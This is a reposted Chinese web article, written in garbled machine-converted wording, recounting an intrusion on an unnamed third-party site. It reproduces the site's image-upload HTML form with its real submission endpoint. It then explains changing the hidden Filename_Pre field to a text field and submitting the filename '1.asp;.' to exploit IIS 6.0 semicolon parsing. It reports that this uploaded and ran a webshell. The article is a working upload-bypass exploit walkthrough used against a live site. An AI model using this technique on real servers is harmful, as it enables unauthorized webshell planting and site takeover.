当前位置:七道奇文章资讯安全技术网络技术
日期:2010-03-12 17:08:00  来源:本站整理

冲破手记 上传漏洞 hidden to text[网络技术]

赞助商链接



  本文“冲破手记 上传漏洞 hidden to text[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

本文是由一个上传的页面冲破上传引发的,话说当时群里谈论纷纷.发出XXX网站的上传地址,研究过来研究过去.没找到冲破,本地改正上传提交仍旧不能冲破.

就在当时,小三毛同志提出改正hidden to text操纵IIS漏洞可取webshell.咱也试下这招数若何

本地构造上传

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
 <html>
 <head>
 <meta http-equiv="Content-Type" content="text/html; charset=gb2312">
 <LINK href="../css/css.css" rel=stylesheet type=text/css>
 <title>上传图片</title>
 </head>
 
 <body leftmargin="0" topmargin="0">
 <table width="100%" border="0" cellspacing="0" cellpadding="0">
  <tr>
  <td height="20" align="center">
 
  </td>
  </tr>
 </table>
 <table width="90%" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="#999999">
  <form action="http://xxx.net/inn/upfilesave.asp" method="post" enctype="multipart/form-data">
 
  <tr>
  <td bgcolor="#FFFFFF"><table width="100%" border="0" cellspacing="0" cellpadding="0">
  <tr>
  <td height="25" bgcolor="#CCCCCC" class="td_14">上传图片</td>
  </tr>
  </table></td>
  </tr>
  <tr>
  <td height="35" align="center" bgcolor="#FFFFFF">
  <input name="image" type="file" id="image">
  </td>
  </tr>
  <tr>
  <td height="35" align="center" bgcolor="#FFFFFF">
  <input type="submit" name="Submit" value="提交" onClick="checkImage('image')">
  <input name="PathFolder" type="hidden" id="PathFolder" value="/img/trade/">
  <input name="FormName" type="hidden" id="FormName" value="add">
  <input name="parent" type="hidden" id="parent" value="img">
  <input name="Filename_Pre" type="text" id="Filename_Pre" value="">
  <input name="Create" type="hidden" id="Create" value="">
  <input type="reset" name="Submit2" value="关闭" onClick="javascript:window.close()">
  </td>
  </tr>
  </form>
 </table>
 </body>
 </html>
 <script language=javascript>
 function checkImage(sId)
 {
  if(( document.all[sId].value.indexOf(".asp") == -1) && (document.all[sId].value.indexOf(".asa") == -1)) {
  //alert("请挑选gif或jpg的图象文件");
  // event.returnValue = false;
  }
 }
 </script> 保存为HTML...

本来

<input name="Filename_Pre" type="hidden" id="Filename_Pre" value="">

改正

<input name="Filename_Pre" type="text" id="Filename_Pre" value="">

翻开本地HTML提交页,上传时填充1.asp;.

成功返回1.asp;_201036165716.jpg.IIS 6.0,成功运行小马~


  以上是“冲破手记 上传漏洞 hidden to text[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
  • 冲破手记 上传漏洞 hidden to text
  • 本文地址: 与您的QQ/BBS好友分享!
    • 好的评价 如果您觉得此文章好,就请您
        0%(0)
    • 差的评价 如果您觉得此文章差,就请您
        0%(0)

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    Copyright © 2020-2022 www.xiamiku.com. All Rights Reserved .